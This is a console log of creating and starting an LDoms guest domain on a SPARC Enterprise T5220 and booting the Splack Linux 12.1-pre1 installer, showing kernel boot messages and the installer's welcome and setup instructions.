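# ldm add-vdisk disk0 splack-disk0@primary-vds0 splack
# ldm bind splack
# ldm start splack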

[    0.000000] PROMLIB: Sun IEEE Boot Prom 'OBP 4.33.6.b 2012/12/11 20:50'
[    0.000000] PROMLIB: Root node compatible: sun4v
[    0.000000] Linux version 2.6.23.17-gl64090105 (root@toad) (gcc version 4.2.3) #2 SMP Tue Jan 6 04:22:34 Local time zone must be set--see zic m
[    0.000000] ARCH: SUN4V
[    0.000000] Ethernet address: 00:14:4f:fb:fa:64
[    0.000000] OF stdout device is: /virtual-devices@100/console@1
[    0.000000] PROM: Built device tree with 35549 bytes of memory.
[    0.000000] MDESC: Size is 19680 bytes.
[    0.000000] PLATFORM: banner-name [SPARC Enterprise T5220]
[    0.000000] PLATFORM: name [SUNW,SPARC-Enterprise-T5220]
[    0.000000] PLATFORM: hostid [84fbfa64]
[    0.000000] PLATFORM: serial# [00ab4130]
[    0.000000] PLATFORM: stick-frequency [5458c3a0]
[    0.000000] PLATFORM: mac-address [144ffbfa64]
[    0.000000] PLATFORM: watchdog-resolution [1000 ms]
[    0.000000] PLATFORM: watchdog-max-timeout [31536000000 ms]
[    0.000000] PLATFORM: max-cpus [64]
[    0.000000] On node 0 totalpages: 1046987
[    0.000000]   Normal zone: 7278 pages used for memmap
[    0.000000]   Normal zone: 0 pages reserved
[    0.000000]   Normal zone: 1039709 pages, LIFO batch:15
[    0.000000]   Movable zone: 0 pages used for memmap
[    0.000000] Built 1 zonelists in Zone order.  Total pages: 1039709
...
...
...
 
 
Welcome to the Splack Linux installation disk! (version 12.1-pre1)
 
######  IMPORTANT!  READ THE INFORMATION BELOW CAREFULLY.  ######
 
- You will need one or more partitions of type 'Linux' prepared.  It is also
  recommended that you create a swap partition (type 'Linux swap') prior
  to installation.  For more information, run 'setup' and read the help file.
 
- If you're having problems that you think might be related to low memory (this
  is possible on machines with 64 or less megabytes of system memory), you can
  try activating a swap partition before you run setup.  After making a swap
  partition (type 82) with cfdisk or fdisk, activate it like this: 
    mkswap /dev/<partition> ; swapon /dev/<partition>
 
- Once you have prepared the disk partitions for Linux, type 'setup' to begin
  the installation process.  
 
- If you do not have a color monitor, type:  TERM=vt100
  before you start 'setup'.
 
You may now login as 'root'.
 
slackware login: 
 
Linux 2.6.23.17-gl64090105.
 
If you're upgrading an existing Slackware system, you might want to
remove old packages before you run 'setup' to install the new ones. If
you don't, your system will still work but there might be some old files
left laying around on your drive.
 
Just mount your Linux partitions under /mnt and type 'pkgtool'. If you
don't know how to mount your partitions, type 'pkgtool' and it will tell
you how it's done.
 
To partition your hard drive(s), use 'cfdisk' or 'fdisk'.
To activate PCMCIA/Cardbus devices needed for installation, type 'pcmcia'.
To start the main installation, type 'setup'.
 
root@slackware:/#